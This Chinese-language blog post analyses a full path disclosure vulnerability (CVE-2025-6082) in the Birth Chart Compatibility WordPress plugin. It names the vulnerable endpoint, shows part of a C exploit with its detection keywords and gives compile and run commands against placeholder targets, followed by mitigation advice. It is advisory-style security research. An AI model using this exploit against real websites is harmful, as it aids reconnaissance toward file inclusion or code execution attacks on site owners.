WordPress插件全路径泄露漏洞分析与利用

本文详细分析了Birth Chart Compatibility WordPress插件2.0版本中的全路径泄露漏洞(CVE-2025-6082),提供了完整的漏洞利用代码和技术细节,帮助安全研究人员理解该漏洞的原理和利用方法。

Birth Chart Compatibility WordPress插件2.0 - 全路径泄露漏洞

漏洞概述

CVE编号: CVE-2025-6082
漏洞类型: 全路径泄露
影响版本: Birth Chart Compatibility WordPress插件 <= v2.0
软件链接: https://frp.wordpress.org/plugins/birth-chart-compatibility/

技术细节

该漏洞存在于"Birth Chart Compatibility"WordPress插件的index.php端点中,攻击者可以通过发送特定的HTTP GET请求来触发PHP警告或致命错误,从而泄露服务器的完整文件系统路径。

漏洞原理

漏洞利用程序向目标网站的以下路径发送请求:

1
/wp-content/plugins/birth-chart-compatibility/index.php

当服务器处理该请求时,会产生包含完整服务器路径的错误信息,例如:

  • /var/www/html/wp-content/plugins/...
  • C:\\xampp\\htdocs\\...

利用代码分析

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
#include<stdio.h>
#include"argparse.h"
#include<string.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <unistd.h>
#define FULL 2300

const char *keyFound[] = 
{
    "Warning:",
    "Fatal error:",
    "/var/www/",
    "C:\\xampp\\"
};

利用程序使用libcurl库发送HTTP请求,并通过以下关键词来识别路径泄露:

  • “Warning:” - PHP警告信息
  • “Fatal error:” - PHP致命错误
  • “/var/www/” - Linux系统典型路径
  • “C:\xampp\” - Windows系统典型路径

功能特性

  1. 支持Cookie文件: 可通过-c参数指定cookie文件进行认证
  2. 详细模式: 使用-v参数启用详细输出
  3. 循环请求: 支持通过-f参数进行多次重复请求
  4. HTTPS支持: 支持SSL/TLS连接,但默认禁用证书验证

编译和运行

1
2
3
4
5
6
# 编译
gcc exploit.c -lcurl -o exploit

# 运行示例
./exploit -u https://target-website.com
./exploit -u http://target.com -c cookies.txt -v

安全影响

泄露服务器完整路径信息可能被攻击者用于:

  • 本地文件包含(LFI)攻击
  • 远程代码执行(RCE)攻击
  • 系统侦察和信息收集
  • 其他攻击链的构建

防护建议

  1. 升级到修复该漏洞的插件版本
  2. 在生产环境中禁用错误信息显示
  3. 配置Web服务器不返回详细错误信息
  4. 定期进行安全审计和漏洞扫描

该漏洞利用代码仅供教育研究和授权测试使用,未经授权对他人系统进行测试可能违反相关法律法规。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计